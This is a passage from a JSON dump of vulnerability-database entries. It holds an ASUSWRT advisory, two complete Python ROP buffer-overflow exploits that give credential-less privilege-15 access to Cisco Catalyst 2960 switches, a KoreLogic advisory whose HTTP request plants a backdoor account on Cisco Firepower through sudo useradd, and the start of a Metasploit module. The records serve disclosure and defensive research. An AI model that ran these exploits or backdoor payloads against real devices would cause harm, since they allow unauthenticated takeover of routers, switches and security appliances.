strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\tp = post_buf;\r\n\t\t\tname = strstr(p, \"\\\"\") + 1;\r\n\t\t\tp = strstr(name, \"\\\"\");\r\n\t\t\tstrcpy(p++, \"\\0\");\r\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\r\n\t\t\tp = strstr(value, \"\\r\");\r\n\t\t\tstrcpy(p, \"\\0\");\r\n\t\t\t//printf(\"%s=%s\\n\", name, value);\r\n\t\t\tnvram_set(name, value);\r\n\t\t}\r\n\t}\r\n...\r\n}\r\n\r\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\r\n\r\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\r\n\r\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\r\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\r\n\r\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\r\n\r\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\r\n\r\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\r\n- Header\r\n typedef struct iboxPKTEx\r\n {\r\n BYTE\t\tServiceID;\r\n BYTE\t\tPacketType;\r\n WORD\t\tOpCode;\r\n DWORD \t\tInfo; // Or Transaction ID\r\n BYTE\t\tMacAddress[6];\r\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\r\n } ibox_comm_pkt_hdr_ex;\r\n\r\n- Body\r\n typedef struct iboxPKTCmd\r\n {\r\n WORD\t\tlen;\r\n BYTE\t\tcmd[420];\t\t<--- command goes here\r\n } PKT_SYSCMD;\t\t// total 422 bytes\r\n\r\nA Metasploit module exploiting this vulnerability has been released [3].\r\n\r\n\r\n>> Fix:\r\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\r\nSee [4] for the very few details and new firmware released by Asus.\r\n\r\n\r\n>> References:\r\n[1] https://blogs.securiteam.com/index.php/archives/3589\r\n[2] https://github.com/jduck/asus-cmd\r\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\r\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/raw/43881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-04-13T11:17:45", "description": "Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "exploitdb", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-12T00:00:00", "id": "EDB-ID:41874", "href": "https://www.exploit-db.com/exploits/41874/", "sourceData": "#!/usr/bin/python\r\n# Author:\r\n# Artem Kondratenko (@artkond)\r\n\r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n\r\nset_credless = True\r\n\r\nif len(sys.argv) < 3:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\nelif sys.argv[2] == '--unset':\r\n\tset_credless = False\r\nelif sys.argv[2] == '--set':\r\n\tpass\r\nelse:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\n\r\n\r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n\r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\n#sleep(0.5)\r\nprint '[+] Sending cluster option'\r\n\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n\r\n\r\n\r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x2c\\x8b\\x74'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n\tpayload += '\\x00\\x00\\x99\\x80'\t# +12 set address of func that rets 1\r\nelse:\r\n\tpayload +=\t'\\x00\\x04\\xea\\x58'\t# unset \r\npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xdf\\xfb\\xe8' \t\t# +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC'\t\t\t\t\t# +8 \r\npayload += 'DDDD'\t\t\t\t\t# +12\r\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x78\\x8c'\t\t# +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x2c\\x8b\\x60'\t\t# +8 r1+8 = 0x022c8b60\r\npayload += 'FFFF'\t\t\t\t\t# +12 \r\npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6b\\xa1\\x28' \t\t# +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n\tpayload += '\\x00\\x12\\x52\\x1c'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; \r\nelse:\r\n\tpayload += '\\x00\\x04\\xe6\\xf0'\t# unset\r\npayload += 'HHHH'\t\t\t\t\t# +12\r\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x48\\xe5\\x60'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\r\npayload += 'KKKK'\t\t\t\t\t# +12\r\npayload += 'LLLL'\t\t\t\t\t# +16\r\npayload += '\\x01\\x13\\x31\\xa8'\t\t# +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n\r\ns.send(payload)\r\n\r\nprint '[+] All done'\r\n\r\ns.close()", "sourceHref": "https://www.exploit-db.com/download/41874/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-25T23:37:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "exploitdb", "title": "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-6433", "CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EDB-ID:40463", "href": "https://www.exploit-db.com/exploits/40463", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\r\nExecution Leading to Root Access\r\n\r\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\r\nLeading to Root Access\r\nAdvisory ID: KL-001-2016-007\r\nPublication Date: 2016.10.05\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Cisco\r\n Affected Product: Firepower Threat Management Console\r\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\r\n Type, CWE-94: Improper Control of Generation of Code\r\n Impact: Arbitrary Code Execution\r\n Attack vector: HTTP\r\n CVE-ID: CVE-2016-6433\r\n\r\n2. Vulnerability Description\r\n\r\n An authenticated user can run arbitrary system commands as\r\n the www user which leads to root.\r\n\r\n3. Technical Description\r\n\r\n A valid session and CSRF token is required. The webserver runs as\r\n a non-root user which is permitted to sudo commands as root with\r\n no password.\r\n\r\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\r\n Host: 1.3.3.7\r\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\r\nGecko/20100101 Firefox/45.0\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate, br\r\n DNT: 1\r\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\r\n Connection: close\r\n Content-Type: multipart/form-data;\r\nboundary=---------------------------15519792567789791301241925798\r\n Content-Length: 813\r\n\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"manual_update\"\r\n\r\n 1\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"source\"\r\n\r\n file\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"file\";\r\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\r\n Content-Type: application/octet-stream\r\n\r\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"action_submit\"\r\n\r\n Import\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"sf_action_id\"\r\n\r\n 8c6059ae8dbedc089877b16b7be2ae7f\r\n -----------------------------15519792567789791301241925798--\r\n\r\n\r\n HTTP/1.1 200 OK\r\n Date: Sat, 23 Apr 2016 13:38:01 GMT\r\n Server: Apache\r\n Vary: Accept-Encoding\r\n X-Frame-Options: SAMEORIGIN\r\n Content-Length: 49998\r\n Connection: close\r\n Content-Type: text/html; charset=utf-8\r\n\r\n ...\r\n\r\n $ ssh korelogic@1.3.3.7\r\n Password:\r\n\r\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\r\n Cisco is a registered trademark of Cisco Systems, Inc.\r\n All other trademarks are property of their respective owners.\r\n\r\n Cisco Fire Linux OS v6.0.1 (build 37)\r\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\r\n\r\n Could not chdir to home directory /Volume/home/korelogic: No such file or\r\ndirectory\r\n korelogic@firepower:/$ sudo su -\r\n Password:\r\n root@firepower:~#\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n The vendor has acknowledged this vulnerability but has\r\n not issued a fix. Vendor acknowledgement available at:\r\n\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\r\nKoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\r\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\r\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\r\n this vulnerability and for 3 others reported in the\r\n same product.\r\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.09 - KoreLogic asks for an update on the status of the\r\n remediation efforts.\r\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\r\n completed.\r\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\r\n will be released publicly on 2016.10.05.\r\n 2016.10.05 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n See Technical Description\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2016\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "sourceHref": "https://www.exploit-db.com/raw/40463", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-09-25T22:24:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "exploitdb", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2017-3881", "CVE-2017-3881"], "modified": "2017-04-12T00:00:00", "id": "EDB-ID:41872", "href": "https://www.exploit-db.com/exploits/41872", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow\r\n# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\r\n# Date: 04.10.2017\r\n# Exploit Author: https://twitter.com/artkond\r\n# Vendor Homepage: https://www.cisco.com/\r\n# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)\r\n# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11\r\n# CVE : CVE-2017-3881\r\n# Description:\r\n#\r\n# The exploit connects to the Catalyst switch and patches\r\n# it execution flow to allow credless telnet interaction \r\n# with highest privilege level\r\n#\r\n\r\n\r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n\r\nset_credless = True\r\n\r\nif len(sys.argv) < 3:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\nelif sys.argv[2] == '--unset':\r\n\tset_credless = False\r\nelif sys.argv[2] == '--set':\r\n\tpass\r\nelse:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\n\r\n\r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n\r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\nprint '[+] Sending cluster option'\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n\r\n\r\n\r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x3d\\x55\\xdc'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n\tpayload += '\\x00\\x00\\x99\\x9c'\t# +12 set address of func that rets 1\r\nelse:\r\n\tpayload +=\t'\\x00\\x04\\xeA\\xe0'\t# unset \r\npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xe1\\xa9\\xf4' \t\t# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC'\t\t\t\t\t# +8 \r\npayload += 'DDDD'\t\t\t\t\t# +12\r\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x7b\\x5c'\t\t# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x3d\\x55\\xc8'\t\t# +8 r1+8 = 0x23d55c8\r\npayload += 'FFFF'\t\t\t\t\t# +12 \r\npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6c\\xb3\\xa0' \t\t# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n\tpayload += '\\x00\\x27\\x0b\\x94'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; \r\nelse:\r\n\tpayload += '\\x00\\x04\\xe7\\x78'\t# unset\r\npayload += 'HHHH'\t\t\t\t\t# +12\r\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x4a\\xcf\\x98'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\r\npayload += 'KKKK'\t\t\t\t\t# +12\r\npayload += 'LLLL'\t\t\t\t\t# +16\r\npayload += '\\x01\\x14\\xe7\\xec'\t\t# +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n\r\ns.send(payload)\r\n\r\nprint '[+] All done'\r\n\r\ns.close()", "sourceHref": "https://www.exploit-db.com/raw/41872", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2023-07-13T15:27:58", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:9EC44034675C3CB4D052F0A57AE94026", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:16:57", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:21", "description": "No description provided by source.", "cvss3": {}, "published": "2017-02-24T00:00:00", "type": "seebug", "title": "Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (CVE-2016-6433)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-02-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92711", "id": "SSV:92711", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 